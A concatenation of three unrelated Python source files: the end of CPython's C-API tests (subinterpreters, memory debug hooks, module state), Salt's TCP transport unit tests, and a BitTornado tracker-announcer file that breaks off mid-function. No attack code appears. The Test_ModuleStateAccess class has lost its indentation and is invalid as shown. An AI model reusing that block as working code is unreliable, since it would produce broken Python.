            import sys, builtins, pickle
            with open({:d}, "wb") as f:
                pickle.dump(id(sys.modules), f)
                pickle.dump(id(builtins), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            # The ids must differ from the main interpreter's objects.
            self.assertNotEqual(pickle.load(f), id(sys.modules))
            self.assertNotEqual(pickle.load(f), id(builtins))
    def test_subinterps_recent_language_features(self):
        """Recent syntax (3.9 decorator expressions, 3.8 walrus, f-strings,
        async def) must compile and run inside a subinterpreter."""
        r, w = os.pipe()
        code = """if 1:
            import pickle
            with open({:d}, "wb") as f:

                @(lambda x:x)  # Py 3.9
                def noop(x): return x

                a = (b := f'1{{2}}3') + noop('x')  # Py 3.8 (:=) / 3.6 (f'')

                async def foo(arg): return await arg  # Py 3.5

                pickle.dump(dict(a=a, b=b), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
    def test_mutate_exception(self):
        """
        Exceptions saved in global module state get shared between
        individual module instances. This test checks whether or not
        a change in one interpreter's module gets reflected into the
        other ones.
        """
        import binascii
        support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
        self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
    """Thread-state handling exercised via _testcapi._test_thread_state."""
    @support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []
            def callback():
                idents.append(threading.get_ident())
            _testcapi._test_thread_state(callback)
            # NOTE(review): presumably keeps extra references to the callback
            # alive while the C side still uses it — confirm.
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(threading.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")
        # Run once on the main thread and once on a secondary thread.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
class Test_testcapi(unittest.TestCase):
    # Auto-generate one test method per 'test_' callable exported by
    # _testcapi (the checks themselves run in C).  Names ending in '_code'
    # are excluded — presumably not directly runnable here; confirm.
    locals().update((name, getattr(_testcapi, name))
                    for name in dir(_testcapi)
                    if name.startswith('test_') and not name.endswith('_code'))
class Test_testinternalcapi(unittest.TestCase):
    # Auto-generate one test method per 'test_' callable exported by
    # _testinternalcapi (the checks themselves run in C).
    locals().update((name, getattr(_testinternalcapi, name))
                    for name in dir(_testinternalcapi)
                    if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
    """Check the error reports produced by the PYTHONMALLOC debug hooks.
    Subclasses vary the PYTHONMALLOC setting."""
    PYTHONMALLOC = 'debug'
    # '0x04c06e0' or '04C06E0'
    PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
    def check(self, code):
        """Run *code* in a subprocess expected to fail and return its stderr
        decoded as ASCII (undecodable bytes replaced)."""
        with support.SuppressCrashReport():
            out = assert_python_failure('-c', code,
                                        PYTHONMALLOC=self.PYTHONMALLOC)
            stderr = out.err
        return stderr.decode('ascii', 'replace')
    def test_buffer_overflow(self):
        """Writing past the end of a debug-allocated block must be reported."""
        out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
                 r"        at tail\+0: 0x78 \*\*\* OUCH\n"
                 r"        at tail\+1: 0xfd\n"
                 r"        at tail\+2: 0xfd\n"
                 r"        .*\n"
                 r"(    The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
                 r"    Data at p: cd cd cd .*\n"
                 r"\n"
                 r"Enable tracemalloc to get the memory block allocation traceback\n"
                 r"\n"
                 r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
        regex = regex.format(ptr=self.PTR_REGEX)
        regex = re.compile(regex, flags=re.DOTALL)
        self.assertRegex(out, regex)
    def test_api_misuse(self):
        """Freeing with a different allocator family than the one used to
        allocate must be reported."""
        out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
                 r"(    The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
                 r"    Data at p: cd cd cd .*\n"
                 r"\n"
                 r"Enable tracemalloc to get the memory block allocation traceback\n"
                 r"\n"
                 r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
        regex = regex.format(ptr=self.PTR_REGEX)
        self.assertRegex(out, regex)
    def check_malloc_without_gil(self, code):
        """Helper: *code* must die with the 'called without holding the GIL'
        fatal error."""
        out = self.check(code)
        expected = ('Fatal Python error: _PyMem_DebugMalloc: '
                    'Python memory allocator called without holding the GIL')
        self.assertIn(expected, out)
    def test_pymem_malloc_without_gil(self):
        # Debug hooks must raise an error if PyMem_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
        self.check_malloc_without_gil(code)
    def test_pyobject_malloc_without_gil(self):
        # Debug hooks must raise an error if PyObject_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
        self.check_malloc_without_gil(code)
    def check_pyobject_is_freed(self, func_name):
        """Helper: _testcapi.{func_name}() must detect its corrupted object
        and raise _testcapi.error (exit code 0 means detection succeeded)."""
        code = textwrap.dedent(f'''
            import gc, os, sys, _testcapi
            # Disable the GC to avoid crash on GC collection
            gc.disable()
            try:
                _testcapi.{func_name}()
                # Exit immediately to avoid a crash while deallocating
                # the invalid object
                os._exit(0)
            except _testcapi.error:
                os._exit(1)
        ''')
        assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
    def test_pyobject_null_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_null_is_freed')
    def test_pyobject_uninitialized_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
    def test_pyobject_forbidden_bytes_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
    def test_pyobject_freed_is_freed(self):
        self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
    # Same checks with the debug hooks installed on top of the raw
    # malloc allocator.
    PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
    # Same checks with the debug hooks installed on top of pymalloc.
    PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
    # test default allocator of Python compiled in debug mode
    # (debug builds enable the debug hooks without any PYTHONMALLOC setting)
    PYTHONMALLOC = ''
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
if __name__ == "__main__":
    # Allow running this test file directly.
    unittest.main()
|
test_tcp.py | # -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from tests.support.helpers import flaky, get_unused_localhost_port
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
    """
    Test the req server/client pair
    """

    @classmethod
    def setUpClass(cls):
        # The base class defines no _handle_payload; only concrete
        # subclasses actually start a server.
        if not hasattr(cls, "_handle_payload"):
            return
        # Allocate a fresh set of localhost ports for this class run.
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            "master",
            **{
                "transport": "tcp",
                "auto_accept": True,
                "ret_port": ret_port,
                "publish_port": publish_port,
                "tcp_master_pub_port": tcp_master_pub_port,
                "tcp_master_pull_port": tcp_master_pull_port,
                "tcp_master_publish_pull": tcp_master_publish_pull,
                "tcp_master_workers": tcp_master_workers,
            }
        )
        cls.minion_config = cls.get_temp_config(
            "minion",
            **{
                "transport": "tcp",
                "master_ip": "127.0.0.1",
                "master_port": ret_port,
                "master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
            }
        )
        cls.process_manager = salt.utils.process.ProcessManager(
            name="ReqServer_ProcessManager"
        )
        cls.server_channel = salt.transport.server.ReqServerChannel.factory(
            cls.master_config
        )
        cls.server_channel.pre_fork(cls.process_manager)
        cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
        cls.stop = threading.Event()
        cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        # Run the server's IO loop on a background thread until `stop` is set.
        cls.server_thread = threading.Thread(
            target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
        )
        cls.server_thread.start()

    @classmethod
    def tearDownClass(cls):
        # Shut the channel down first so the loop thread can exit cleanly.
        cls.server_channel.close()
        cls.stop.set()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        del cls.server_channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    """
    Request-channel tests that run over clear (unencrypted) messages.
    """

    def setUp(self):
        # Every test gets its own clear-crypt request channel.
        factory = salt.transport.client.ReqChannel.factory
        self.channel = factory(self.minion_config, crypt="clear")

    def tearDown(self):
        channel = self.channel
        channel.close()
        del self.channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        Echo the payload straight back (TODO: something besides echo).
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    """Request-channel tests over the default (AES encrypted) transport."""

    def setUp(self):
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)

    def tearDown(self):
        channel = self.channel
        channel.close()
        del self.channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        Echo the payload back through the encrypted channel.
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))

    # TODO: make failed returns have a specific framing so we can raise the same exception
    # on encrypted channels
    @flaky
    @skipIf(True, "SLOWTEST skip")
    def test_badload(self):
        """
        Test a variety of bad requests, make sure that we get some sort of error
        """
        for bad_msg in ("", [], ()):
            with self.assertRaises(salt.exceptions.AuthenticationError):
                self.channel.send(bad_msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
    """
    Test the req server/client pair
    """

    @classmethod
    def setUpClass(cls):
        # Allocate fresh localhost ports for both the pub and req servers.
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            "master",
            **{
                "transport": "tcp",
                "auto_accept": True,
                "ret_port": ret_port,
                "publish_port": publish_port,
                "tcp_master_pub_port": tcp_master_pub_port,
                "tcp_master_pull_port": tcp_master_pull_port,
                "tcp_master_publish_pull": tcp_master_publish_pull,
                "tcp_master_workers": tcp_master_workers,
            }
        )
        cls.minion_config = cls.get_temp_config(
            "minion",
            **{
                "transport": "tcp",
                "master_ip": "127.0.0.1",
                "auth_timeout": 1,
                "master_port": ret_port,
                "master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
            }
        )
        cls.process_manager = salt.utils.process.ProcessManager(
            name="ReqServer_ProcessManager"
        )
        cls.server_channel = salt.transport.server.PubServerChannel.factory(
            cls.master_config
        )
        cls.server_channel.pre_fork(cls.process_manager)
        # we also require req server for auth
        cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
            cls.master_config
        )
        cls.req_server_channel.pre_fork(cls.process_manager)
        cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
        cls.stop = threading.Event()
        cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        # Run the server IO loop on a background thread until `stop` is set.
        cls.server_thread = threading.Thread(
            target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
        )
        cls.server_thread.start()

    @classmethod
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        return payload, {"fun": "send_clear"}

    @classmethod
    def tearDownClass(cls):
        cls.req_server_channel.close()
        cls.server_channel.close()
        cls.stop.set()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        del cls.req_server_channel

    def setUp(self):
        super(BaseTCPPubCase, self).setUp()
        # Snapshot the IOLoop handlers so tearDown can detect leaked FDs.
        self._start_handlers = dict(self.io_loop._handlers)

    def tearDown(self):
        super(BaseTCPPubCase, self).tearDown()
        # Any handler that was added (or replaced) during the test and not
        # removed again indicates a file descriptor leak.
        failures = []
        for k, v in six.iteritems(self.io_loop._handlers):
            if self._start_handlers.get(k) != v:
                failures.append((k, v))
        if failures:
            raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
        del self.channel
        del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
    @skipIf(True, "SLOWTEST skip")
    def test_connect_publish_port(self):
        """
        test when publish_port is not 4506
        """
        opts = self.get_temp_config("master")
        opts["master_uri"] = ""
        opts["master_ip"] = "127.0.0.1"
        opts["publish_port"] = 1234
        channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
        # Stub out authentication and the message client pool so connect()
        # never touches the network.
        patch_auth = MagicMock(return_value=True)
        patch_client = MagicMock(spec=SaltMessageClientPool)
        with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
            "salt.crypt.AsyncAuth.authenticated", patch_auth
        ), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
            channel.connect()
        # The pool must be constructed with the explicitly configured port.
        assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
# The whole suite is currently disabled; the mixin provides the test bodies.
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
    """
    Tests around the publish system
    """
class SaltMessageClientPoolTest(AsyncTestCase):
    """Unit tests for SaltMessageClientPool with fully mocked clients."""

    def setUp(self):
        super(SaltMessageClientPoolTest, self).setUp()
        sock_pool_size = 5
        # Stub the client constructor so no sockets are ever opened.
        with patch(
            "salt.transport.tcp.SaltMessageClient.__init__",
            MagicMock(return_value=None),
        ):
            self.message_client_pool = SaltMessageClientPool(
                {"sock_pool_size": sock_pool_size}, args=({}, "", 0)
            )
        # Keep the real clients alive for tearDown, test against mocks.
        self.original_message_clients = self.message_client_pool.message_clients
        self.message_client_pool.message_clients = [
            MagicMock() for _ in range(sock_pool_size)
        ]

    def tearDown(self):
        with patch(
            "salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
        ):
            del self.original_message_clients
        super(SaltMessageClientPoolTest, self).tearDown()

    def test_send(self):
        # send() should route to the client with the shortest send queue.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock.send.return_value = []
        self.assertEqual([], self.message_client_pool.send())
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2].send.return_value = [1]
        self.assertEqual([1], self.message_client_pool.send())

    def test_write_to_stream(self):
        # write_to_stream() picks the least-loaded client's stream.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock._stream.write.return_value = []
        self.assertEqual([], self.message_client_pool.write_to_stream(""))
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
        self.assertEqual([1], self.message_client_pool.write_to_stream(""))

    def test_close(self):
        self.message_client_pool.close()
        self.assertEqual([], self.message_client_pool.message_clients)

    def test_on_recv(self):
        # on_recv() must be fanned out to every pooled client.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.on_recv.return_value = None
        self.message_client_pool.on_recv()
        for message_client_mock in self.message_client_pool.message_clients:
            self.assertTrue(message_client_mock.on_recv.called)

    def test_connect_all(self):
        @gen_test
        def test_connect(self):
            yield self.message_client_pool.connect()

        # Every client resolves immediately, so connect() completes.
        for message_client_mock in self.message_client_pool.message_clients:
            future = salt.ext.tornado.concurrent.Future()
            future.set_result("foo")
            message_client_mock.connect.return_value = future

        self.assertIsNone(test_connect(self))

    def test_connect_partial(self):
        @gen_test(timeout=0.1)
        def test_connect(self):
            yield self.message_client_pool.connect()

        # Only every other client resolves; connect() must not complete
        # until all do, so the gen_test deadline fires.
        for idx, message_client_mock in enumerate(
            self.message_client_pool.message_clients
        ):
            future = salt.ext.tornado.concurrent.Future()
            if idx % 2 == 0:
                future.set_result("foo")
            message_client_mock.connect.return_value = future

        with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
            test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
    """Verify SaltMessageClient detaches from its IOLoop on close()."""

    def setUp(self):
        # A real listening socket for the client to connect to.
        self.listen_on = "127.0.0.1"
        self.port = get_unused_localhost_port()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.listen_on, self.port))
        self.sock.listen(1)

    def tearDown(self):
        self.sock.close()
        del self.sock

    def test_message_client(self):
        """
        test message client cleanup on close
        """
        orig_loop = salt.ext.tornado.ioloop.IOLoop()
        orig_loop.make_current()
        opts = self.get_temp_config("master")
        client = SaltMessageClient(opts, self.listen_on, self.port)

        # Mock the io_loop's stop method so we know when it has been called.
        orig_loop.real_stop = orig_loop.stop
        orig_loop.stop_called = False

        def stop(*args, **kwargs):
            orig_loop.stop_called = True
            orig_loop.real_stop()

        orig_loop.stop = stop
        try:
            assert client.io_loop == orig_loop
            client.io_loop.run_sync(client.connect)

            # Ensure we are testing the _read_until_future and io_loop teardown
            assert client._stream is not None
            assert client._read_until_future is not None
            assert orig_loop.stop_called is True

            # The run_sync call will set stop_called, reset it
            orig_loop.stop_called = False
            client.close()

            # Stop should be called again, client's io_loop should be None
            assert orig_loop.stop_called is True
            assert client.io_loop is None
        finally:
            # Restore the loop so other tests see a pristine object.
            orig_loop.stop = orig_loop.real_stop
            del orig_loop.real_stop
            del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
    """Publish-side topic filtering tests for TCPPubServerChannel."""

    @patch("salt.master.SMaster.secrets")
    @patch("salt.crypt.Crypticle")
    @patch("salt.utils.asynchronous.SyncWrapper")
    def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
        opts = self.get_temp_config("master")
        opts["sign_pub_messages"] = False
        channel = TCPPubServerChannel(opts)

        # Stub crypto and the wrapped transport; we only inspect the
        # payload handed to wrap.send().
        wrap = MagicMock()
        crypt = MagicMock()
        crypt.dumps.return_value = {"test": "value"}
        secrets.return_value = {"aes": {"secret": None}}
        crypticle.return_value = crypt
        sync_wrapper.return_value = wrap

        # try simple publish with glob tgt_type
        channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
        payload = wrap.send.call_args[0][0]

        # verify we send it without any specific topic
        assert "topic_lst" not in payload

        # try simple publish with list tgt_type
        channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
        payload = wrap.send.call_args[0][0]

        # verify we send it with correct topic
        assert "topic_lst" in payload
        self.assertEqual(payload["topic_lst"], ["minion01"])

        # try with syndic settings
        opts["order_masters"] = True
        channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
        payload = wrap.send.call_args[0][0]

        # verify we send it without topic for syndics
        assert "topic_lst" not in payload

    @patch("salt.utils.minions.CkMinions.check_minions")
    @patch("salt.master.SMaster.secrets")
    @patch("salt.crypt.Crypticle")
    @patch("salt.utils.asynchronous.SyncWrapper")
    def test_publish_filtering_str_list(
        self, sync_wrapper, crypticle, secrets, check_minions
    ):
        opts = self.get_temp_config("master")
        opts["sign_pub_messages"] = False
        channel = TCPPubServerChannel(opts)

        wrap = MagicMock()
        crypt = MagicMock()
        crypt.dumps.return_value = {"test": "value"}
        secrets.return_value = {"aes": {"secret": None}}
        crypticle.return_value = crypt
        sync_wrapper.return_value = wrap
        check_minions.return_value = {"minions": ["minion02"]}

        # try simple publish with list tgt_type
        channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
        payload = wrap.send.call_args[0][0]

        # verify we send it with correct topic
        assert "topic_lst" in payload
        self.assertEqual(payload["topic_lst"], ["minion02"])

        # verify it was correctly calling check_minions
        check_minions.assert_called_with("minion02", tgt_type="list")
|
Rerequester.py | # Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from horde.BitTornado.zurllib import urlopen, quote
from urlparse import urlparse, urlunparse
from socket import gethostbyname
from btformats import check_peers
from horde.BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
from sha import sha
from time import time
try:
    from os import getpid
except ImportError:
    # Platforms without os.getpid: fall back to a constant so the
    # key-generation seed below still works.
    def getpid():
        return 1

try:
    True
except:
    # Very old Pythons (pre bool): define True/False as plain ints.
    True = 1
    False = 0

# 64-symbol alphabet used to encode per-tracker keys.
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}  # tracker url -> generated key string
# Per-process seed mixed into every tracker key.
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
    # Derive a 6-character key for this tracker from the process-unique
    # seed; each output char is taken from the 64-symbol alphabet.
    # (Python 2: digest() is a str, so bytes are indexed via ord().)
    key = ''
    for i in sha(basekeydata+tracker).digest()[-6:]:
        key += mapbase64[ord(i) & 0x3F]
    keys[tracker] = key
def get_key(tracker):
    # Return the cached '&key=' query fragment for this tracker,
    # generating and caching the key on first use (EAFP on KeyError).
    try:
        return "&key="+keys[tracker]
    except:
        add_key(tracker)
        return "&key="+keys[tracker]
class fakeflag:
    """Minimal stand-in for a threading.Event with a fixed state.

    wait() returns immediately instead of blocking, and isSet() simply
    reports whatever state was supplied at construction time.
    """

    def __init__(self, state=False):
        self.state = state

    def wait(self):
        # Nothing to wait for -- the flag's state never changes.
        pass

    def isSet(self):
        return self.state
class Rerequester:
    """Periodic tracker announcer (multitracker-aware).

    Announces run on worker threads; results are handed back to the
    main thread through externalsched.  A SuccessLock serializes the
    per-tracker attempts and arbitrates between response and timeout.
    """

    def __init__(self, trackerlist, interval, sched, howmany, minpeers,
            connect, externalsched, amount_left, up, down,
            port, ip, myid, infohash, timeout, errorfunc, excfunc,
            maxpeers, doneflag, upratefunc, downratefunc,
            unpauseflag = fakeflag(True),
            seed_id = '', seededfunc = None, force_rapid_update = False ):
        self.excfunc = excfunc
        # Shuffle within each tier (multitracker spec) to spread load
        # across equivalent trackers.
        newtrackerlist = []
        for tier in trackerlist:
            if len(tier)>1:
                shuffle(tier)
            newtrackerlist += [tier]
        self.trackerlist = newtrackerlist
        self.lastsuccessful = ''
        self.rejectedmessage = 'rejected by tracker - '
        # Static part of the announce query string.
        self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
            (quote(infohash), quote(myid), str(port)))
        self.ip = ip
        self.interval = interval
        self.last = None
        self.trackerid = None
        self.announce_interval = 30 * 60
        self.sched = sched
        self.howmany = howmany
        self.minpeers = minpeers
        self.connect = connect
        self.externalsched = externalsched
        self.amount_left = amount_left
        self.up = up
        self.down = down
        self.timeout = timeout
        self.errorfunc = errorfunc
        self.maxpeers = maxpeers
        self.doneflag = doneflag
        self.upratefunc = upratefunc
        self.downratefunc = downratefunc
        self.unpauseflag = unpauseflag
        if seed_id:
            self.url += '&seed_id='+quote(seed_id)
        self.seededfunc = seededfunc
        if seededfunc:
            self.url += '&check_seeded=1'
        self.force_rapid_update = force_rapid_update
        self.last_failed = True
        self.never_succeeded = True
        self.errorcodes = {}
        self.lock = SuccessLock()
        self.special = None
        self.stopped = False

    def start(self):
        # Kick off the fast re-check cycle (c) and the regular announce
        # cycle (d); event 0 is 'started'.
        self.sched(self.c, self.interval/2)
        self.d(0)

    def c(self):
        # Fast cycle: squeeze in an extra announce when short on peers.
        # NOTE(review): the `not unpauseflag.isSet()` guard here mirrors
        # d()/hit() -- confirm the intended pause semantics.
        if self.stopped:
            return
        if not self.unpauseflag.isSet() and (
            self.howmany() < self.minpeers or self.force_rapid_update ):
            self.announce(3, self._c)
        else:
            self._c()

    def _c(self):
        self.sched(self.c, self.interval)

    def d(self, event = 3):
        # Regular announce cycle; event 3 means "no event".
        if self.stopped:
            return
        if not self.unpauseflag.isSet():
            self._d()
            return
        self.announce(event, self._d)

    def _d(self):
        if self.never_succeeded:
            self.sched(self.d, 60)  # retry in 60 seconds
        elif self.force_rapid_update:
            return
        else:
            self.sched(self.d, self.announce_interval)

    def hit(self, event = 3):
        # One-shot announce request from the outside.
        if not self.unpauseflag.isSet() and (
            self.howmany() < self.minpeers or self.force_rapid_update ):
            self.announce(event)

    def announce(self, event = 3, callback = lambda: None, specialurl = None):
        # Build the full query string and hand it to rerequest().
        # Event indices: 0 started, 1 completed, 2 stopped, 3 none.
        if specialurl is not None:
            s = self.url+'&uploaded=0&downloaded=0&left=1'  # don't add to statistics
            if self.howmany() >= self.maxpeers:
                s += '&numwant=0'
            else:
                s += '&no_peer_id=1&compact=1'
            self.last_failed = True  # force true, so will display an error
            self.special = specialurl
            self.rerequest(s, callback)
            return
        else:
            s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
                (self.url, str(self.up()), str(self.down()),
                str(self.amount_left())))
        if self.last is not None:
            s += '&last=' + quote(str(self.last))
        if self.trackerid is not None:
            s += '&trackerid=' + quote(str(self.trackerid))
        if self.howmany() >= self.maxpeers:
            s += '&numwant=0'
        else:
            s += '&no_peer_id=1&compact=1'
        if event != 3:
            s += '&event=' + ['started', 'completed', 'stopped'][event]
        if event == 2:
            self.stopped = True
        self.rerequest(s, callback)

    def snoop(self, peers, callback = lambda: None):  # tracker call support
        # Query the tracker without affecting stats (stopped, port=0).
        self.rerequest(self.url
            +'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
            +str(peers), callback)

    def rerequest(self, s, callback):
        # Serialize announce cycles; if one is still in flight, retry later.
        if not self.lock.isfinished():  # still waiting for prior cycle to complete??
            def retry(self = self, s = s, callback = callback):
                self.rerequest(s, callback)
            self.sched(retry, 5)  # retry in 5 seconds
            return
        self.lock.reset()
        rq = Thread(target = self._rerequest, args = [s, callback])
        rq.setDaemon(False)
        rq.start()

    def _rerequest(self, s, callback):
